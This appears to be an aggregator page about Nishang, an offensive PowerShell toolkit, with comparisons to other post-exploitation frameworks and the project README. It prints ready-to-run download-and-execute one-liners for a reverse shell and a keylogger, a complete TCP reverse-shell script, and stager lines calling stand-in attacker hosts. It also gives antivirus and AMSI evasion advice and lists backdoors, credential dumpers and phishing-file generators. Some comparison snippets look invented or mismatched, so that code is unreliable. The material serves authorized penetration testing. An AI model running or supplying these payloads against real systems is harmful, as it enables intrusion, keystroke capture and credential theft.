nishang
Nishang - Offensive PowerShell for red team, penetration testing and offensive security.
Top Related Projects
PowerSploit - A PowerShell Post-Exploitation Framework
Empire is a PowerShell and Python post-exploitation agent.
Six Degrees of Domain Admin
PowerTools is a collection of PowerShell projects with a focus on offensive operations.
Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
Metasploit Framework
Quick Overview
Nishang is a framework and collection of scripts and payloads for offensive security, penetration testing, and red teaming in PowerShell. It provides various tools for exploitation, scanning, privilege escalation, and post-exploitation tasks, making it a versatile toolkit for security professionals and ethical hackers.
Pros
- Comprehensive set of PowerShell-based tools for various stages of penetration testing
- Regularly updated with new scripts and features
- Easy to use and integrate into existing workflows
- Well-documented with usage instructions for each script
Cons
- May be detected by antivirus software due to its nature as a security testing tool
- Requires PowerShell knowledge for effective use
- Some scripts may be considered malicious by security software or organizations
- Potential for misuse if not handled responsibly
Code Examples
- Reverse TCP Shell:
powershell -ExecutionPolicy Bypass -Command "iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.10 -Port 4444"
This code downloads and executes a reverse TCP shell, connecting back to the specified IP and port.
- Keylogger:
powershell -ExecutionPolicy Bypass -Command "iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Keylogger.ps1'); Invoke-Keylogger -CheckInterval 60 -LogLength 20"
This example downloads and runs a keylogger, checking for new keystrokes every 60 seconds and logging up to 20 characters at a time.
- Port Scanning:
powershell -ExecutionPolicy Bypass -Command "iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Scan/Invoke-PortScan.ps1'); Invoke-PortScan -StartAddress 192.168.1.1 -EndAddress 192.168.1.254 -ResolveHost -ScanPort"
This code performs a port scan on the specified IP range, resolving hostnames and scanning common ports.
Getting Started
To get started with Nishang:
-
Clone the repository:
git clone https://github.com/samratashok/nishang.git
-
Navigate to the Nishang directory:
cd nishang
-
Import the desired script in PowerShell:
Import-Module .\Nishang.psm1
-
Use the imported functions as needed, referring to the documentation for specific usage instructions.
Note: Always ensure you have proper authorization before using these tools in any environment.
Competitor Comparisons
PowerSploit - A PowerShell Post-Exploitation Framework
Pros of PowerSploit
- More comprehensive and extensive collection of PowerShell scripts
- Better documentation and organization of modules
- Actively maintained with regular updates and contributions
Cons of PowerSploit
- Larger codebase, which may be overwhelming for beginners
- Some modules may trigger antivirus software more frequently
- Requires more setup and configuration for certain advanced features
Code Comparison
Nishang (Get-Information.ps1):
function Get-Information
{
$output = "$env:COMPUTERNAME, $env:USERNAME, " + (Get-WmiObject Win32_OperatingSystem).Caption
return $output
}
PowerSploit (Get-ComputerDetails.ps1):
function Get-ComputerDetails
{
[CmdletBinding()] Param()
$Properties = @('ComputerName','OSVersion','OSBuildNumber','OSServicePack','Domain')
Get-WmiObject Win32_OperatingSystem | Select-Object $Properties
}
Both repositories provide PowerShell-based post-exploitation frameworks, but PowerSploit offers a more extensive set of tools with better organization. Nishang, while smaller, may be easier for beginners to navigate and less likely to trigger antivirus software. The code comparison shows that PowerSploit tends to have more detailed and flexible functions, while Nishang often provides simpler, more straightforward implementations.
Empire is a PowerShell and Python post-exploitation agent.
Pros of Empire
- More comprehensive post-exploitation framework with broader capabilities
- Active development and larger community support
- Better integration with other tools and frameworks
Cons of Empire
- Larger footprint and more complex to set up and use
- May trigger more antivirus detections due to its popularity
- Steeper learning curve for beginners
Code Comparison
Empire (PowerShell stager):
$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;
IEX $wc.DownloadString('http://empire.server/launcher');
Nishang (PowerShell reverse shell):
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',4444);
$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()};$client.Close()
Both repositories provide powerful post-exploitation tools, with Empire offering a more comprehensive framework and Nishang focusing on individual PowerShell scripts for various tasks. Empire is better suited for larger operations, while Nishang is more lightweight and easier to use for specific tasks.
Six Degrees of Domain Admin
Pros of BloodHound
- Provides advanced Active Directory visualization and analysis
- Offers a graphical interface for easier understanding of attack paths
- Integrates with other security tools and frameworks
Cons of BloodHound
- Focused specifically on Active Directory environments
- Requires more setup and infrastructure compared to Nishang
- May have a steeper learning curve for beginners
Code Comparison
BloodHound (PowerShell data collection):
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain TESTLAB.LOCAL
Nishang (PowerShell reverse shell):
powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.0.0.1 -Port 4444"
BloodHound is specialized for Active Directory environments, offering advanced visualization and analysis capabilities. It's particularly useful for identifying complex attack paths and privilege escalation opportunities within AD infrastructures.
Nishang, on the other hand, is a more general-purpose post-exploitation framework with a wide range of scripts for various tasks. It's lighter, easier to use for quick operations, and doesn't require additional setup beyond PowerShell.
While BloodHound excels in AD environments, Nishang offers more versatility for different post-exploitation scenarios. The choice between them depends on the specific needs of the security assessment or penetration testing engagement.
PowerTools is a collection of PowerShell projects with a focus on offensive operations.
Pros of PowerTools
- More comprehensive set of post-exploitation tools
- Better integration with other Empire modules
- Active development and community support
Cons of PowerTools
- Larger footprint and potentially more detectable
- Steeper learning curve for beginners
- Less focus on individual offensive PowerShell scripts
Code Comparison
Nishang (Get-Information.ps1):
function Get-Information
{
$OSVersion = (Get-WmiObject Win32_OperatingSystem).Version
$OSName = (Get-WmiObject Win32_OperatingSystem).Caption
$Architecture = (Get-WmiObject Win32_OperatingSystem).OSArchitecture
$Hostname = hostname
$Username = $env:username
PowerTools (Get-ComputerDetails.ps1):
function Get-ComputerDetails {
[CmdletBinding()] Param()
$Properties = @{
'Hostname' = $env:COMPUTERNAME
'Domain' = $env:USERDOMAIN
'Username' = $env:USERNAME
'OS' = (Get-WmiObject -Class Win32_OperatingSystem).Caption
'OSVersion' = (Get-WmiObject -Class Win32_OperatingSystem).Version
Both repositories provide PowerShell scripts for information gathering, but PowerTools offers a more structured approach with additional details. Nishang's scripts are generally more concise and focused on specific tasks, while PowerTools aims for a broader range of post-exploitation capabilities.
Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
Pros of Unicorn
- Focused on payload generation for specific attack vectors
- Simpler to use for quick payload creation
- Regularly updated with new evasion techniques
Cons of Unicorn
- Limited scope compared to Nishang's broader toolkit
- Less flexibility for customizing complex attack scenarios
- Fewer options for post-exploitation activities
Code Comparison
Unicorn (payload generation):
payload = "powershell/shellcode_inject/virtual"
ps_command = generate(payload)
print(ps_command)
Nishang (example script):
$target = "192.168.1.10"
$port = 4444
$payload = "IEX (New-Object Net.WebClient).DownloadString('http://attacker/payload.ps1')"
Invoke-PowerShellTcp -Payload $payload -Reverse -IPAddress $target -Port $port
Summary
Unicorn excels in quick payload generation for specific attack vectors, while Nishang offers a more comprehensive toolkit for various penetration testing scenarios. Unicorn is easier to use for beginners but has a narrower focus. Nishang provides more flexibility and post-exploitation capabilities but may require more expertise to utilize effectively. The choice between them depends on the specific requirements of the penetration testing or red team engagement.
Metasploit Framework
Pros of Metasploit-Framework
- Extensive library of exploits and modules
- Active community and regular updates
- Cross-platform support (Windows, Linux, macOS)
Cons of Metasploit-Framework
- Larger footprint and resource-intensive
- Steeper learning curve for beginners
- More likely to be detected by antivirus software
Code Comparison
Nishang (PowerShell):
function Get-Information
{
$OSVersion = (Get-WmiObject Win32_OperatingSystem).Version
$OSName = (Get-WmiObject Win32_OperatingSystem).Caption
Write-Output "OS: $OSName (Version: $OSVersion)"
}
Metasploit-Framework (Ruby):
def get_sysinfo
sys_info = {}
sys_info['OS'] = Rex::Compat.getenv('OS')
sys_info['COMPUTERNAME'] = Rex::Compat.getenv('COMPUTERNAME')
sys_info
end
Both repositories provide tools for penetration testing and security assessments. Nishang focuses on PowerShell-based scripts for Windows environments, while Metasploit-Framework offers a broader range of exploits and modules across multiple platforms. Nishang is lightweight and easier to use for PowerShell-specific tasks, whereas Metasploit-Framework provides a more comprehensive suite of tools but requires more resources and expertise to utilize effectively.
Convert designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual CopilotREADME
Nishang
Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.
By Nikhil Mittal Founder of Altered Security - Hands-on red team and enterprise security training!
Usage
Import all the scripts in the current PowerShell session (PowerShell v3 onwards).
PS C:\nishang> Import-Module .\nishang.psm1
Use the individual scripts with dot sourcing.
PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1
PS C:\nishang> Get-Information
To get help about any script or function, use:
PS C:\nishang> Get-Help [scriptname] -full
Note that the help is available for the function loaded after running the script and not the script itself since version 0.3.8. In all cases, the function name is same as the script name.
For example, to see the help about Get-WLAN-Keys.ps1, use
PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1
PS C:\nishang> Get-Help Get-WLAN-Keys -Full
Anti Virus
Nishang scripts are flagged by many Anti Viruses as malicious. The scrripts on a target are meant to be used in memory which is very easy to do with PowerShell. Two basic methods to execute PowerShell scripts in memory:
Method 1. Use the in-memory dowload and execute: Use below command to execute a PowerShell script from a remote shell, meterpreter native shell, a web shell etc. and the function exported by it. All the scripts in Nishang export a function with same name in the current PowerShell session.
powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]
Method 2. Use the -encodedcommand
(or -e
) parameter of PowerShell
All the scripts in Nishang export a function with same name in the current PowerShell session. Therefore, make sure the function call is made in the script itself while using encodedcommand parameter from a non-PowerShell shell. For above example, add a function call (without quotes) "Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]"
.
Encode the scrript using Invoke-Encode from Nishang:
PS C:\nishang> . \nishang\Utility\Invoke-Encode
PS C:\nishang> Invoke-Encode -DataToEncode C:\nishang\Shells\Invoke-PowerShellTcp.ps1 -OutCommand
Encoded data written to .\encoded.txt
Encoded command written to .\encodedcommand.txt
From above, use the encoded script from encodedcommand.txt and run it on a target where commands could be executed (a remote shell, meterpreter native shell, a web shell etc.). Use it like below:
C:\Users\target> powershell -e [encodedscript]
If the scripts still get detected changing the function and parameter names and removing the help content will help.
In case Windows 10's AMSI is still blocking script execution, see this blog: http://www.labofapenetrationtester.com/2016/09/amsi.html
Scripts
Nishang currently contains the following scripts and payloads.
ActiveDirectory
Modify AD objects to provide minimal permissions required for DCShadow.
Antak - the Webshell
Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell.
Backdoors
A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
A backdoor which can execute PowerShell scripts at a given time on a target.
A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
A backdoor which can use Windows screen saver for remote command and script execution.
A backdoor which can use alternate data streams and Windows Registry to achieve persistence.
A backdoor which uses well known Debugger trick to execute payload with Sticky keys and Utilman (Windows key + U).
Modify permissions of DCOM and WMI namespaces to allow access to a non-admin user.
Modify permissions of PowerShell remoting to allow access to a non-admin user.
Bypass
Implementation of publicly known methods to bypass/avoid AMSI.
Client
Create infected CHM files which can execute PowerShell commands and scripts.
Create Word files and infect existing ones to run PowerShell commands and scripts.
Create Excel files and infect existing ones to run PowerShell commands and scripts.
Create a HTA file which can be deployed on a web server and used in phishing campaigns.
Create signed JAR files which can be used with applets for script and command execution.
Create shortcut files capable of executing PowerShell commands and scripts.
Create IQY files for phishing credentials and SMB hashes.
Create JS files capable of executing PowerShell commands and scripts.
Create SCT files capable of executing PowerShell commands and scripts.
Create a SCF file which can be used for capturing NTLM hash challenges.
Escalation
When SYSTEM privileges are required.
Introduce vulnerabilities by removing patches.
Bypass UAC.
Execution
Download and execute a PowerShell script in memory.
Download an executable in text format, convert it to an executable, and execute.
Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.
Execute shellcode in memory using DNS TXT queries.
Execute PowerShell commands and scripts or a reverse PowerShell session using rundll32.exe.
Gather
Check for a virtual machine.
Copy the SAM file using Volume Shadow Copy Service.
Trick a user into giving credentials in plain text.
A pair of scripts for egress testing
Get juicy information from a target.
Get LSA Secret from a target.
Get password hashes from a target.
Get WLAN keys in plain text from a target.
Log keystrokes from a target.
Invoke-MimikatzWdigestDowngrade
Dump user passwords in plain on Windows 8.1 and Server 2012
Get password hints of Windows users from a target.
Connect back and Stream target screen using MJPEG.
Load mimikatz in memory. Updated and with some customisation.
Extract juicy information from target process (like browsers) memory using regex.
Exfiltrate information like user credentials, using WLAN SSID.
Identify admin jump-boxes and/or computers used to access Unix machines.
MITM
A local HTTPS proxy for MITM attacks.
Pivot
Check credentials on multiple computers and create PSSessions.
Run-EXEonRemote Copy and execute an executable on multiple machines.
Invoke-NetworkRelay Create network relays between computers.
Prasadhak
Check running hashes of running process against the VirusTotal database.
Scan
Brute force FTP, Active Directory, MSSQL, and Sharepoint.
A handy port scanner.
Powerpreter
All the functionality of nishang in a single script module.
Shells
Send commands and scripts to specifed Gmail account to be executed by Invoke-PsGcatAgent
Execute commands and scripts sent by Invoke-PsGcat.
An interactive PowerShell reverse connect or bind shell
Stripped down version of Invoke-PowerShellTcp. Also contains, a skeleton version which could fit in two tweets.
Invoke-PowerShellTcpOneLineBind
Bind version of Invoke-PowerShellTcpOneLine.
An interactive PowerShell reverse connect or bind shell over UDP
Stripped down version of Invoke-PowerShellUdp.
Reverse interactive PowerShell over HTTPS.
Reverse interactive PowerShell over HTTP.
Clean the system after using Invoke-PoshRatHttps
Interactive PowerShell using WMI.
An interactive PowerShell reverse shell over ICMP.
An interactive PowerShell reverse shell over HTTP using rundll32.exe.
An interactive PowerShell reverse shell over HTTP using regsvr32.exe.
Utility
Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.
Add reboot persistence capability to a script.
Remote persistence added by the Add-Persistence script.
Pipe (|) this to any script to exfiltrate the output.
Transfer a file to the target.
Parse keys logged by the keylogger.
Encode and compress a script or string.
Decode and decompress a script or string from Invoke-Encode.
Run a web server which logs Basic authentication and SMB hashes.
Encode a string to ROT13 or decode a ROT13 string.
Generate DNS TXT records which could be used with other scripts.
[Base64ToString]
[StringToBase64]
[ExetoText]
[TexttoExe]
Updates
Updates about Nishang can be found at my blog http://labofapenetrationtester.com and my Twitter feed @nikhil_mitt.
Bugs, Feedback and Feature Requests
Please raise an issue if you encounter a bug or have a feature request. You can email me at nikhil [dot] uitrgpv at gmail.com
Mailing List
For feedback, discussions, and feature requests, join: http://groups.google.com/group/nishang-users
Contributing
I am always looking for contributors to Nishang. Please submit requests or drop me an email.
Blog Posts
Some helpful blog posts to check out for beginners:
http://www.labofapenetrationtester.com/2014/06/nishang-0-3-4.html
http://labofapenetrationtester.com/2012/08/introducing-nishang-powereshell-for.html
http://labofapenetrationtester.com/2013/08/powerpreter-and-nishang-Part-1.html
http://www.labofapenetrationtester.com/2013/09/powerpreter-and-nishang-Part-2.html
All posts about Nishang:
Top Related Projects
PowerSploit - A PowerShell Post-Exploitation Framework
Empire is a PowerShell and Python post-exploitation agent.
Six Degrees of Domain Admin
PowerTools is a collection of PowerShell projects with a focus on offensive operations.
Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
Metasploit Framework
Convert designs to code with AI
Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.
Try Visual Copilot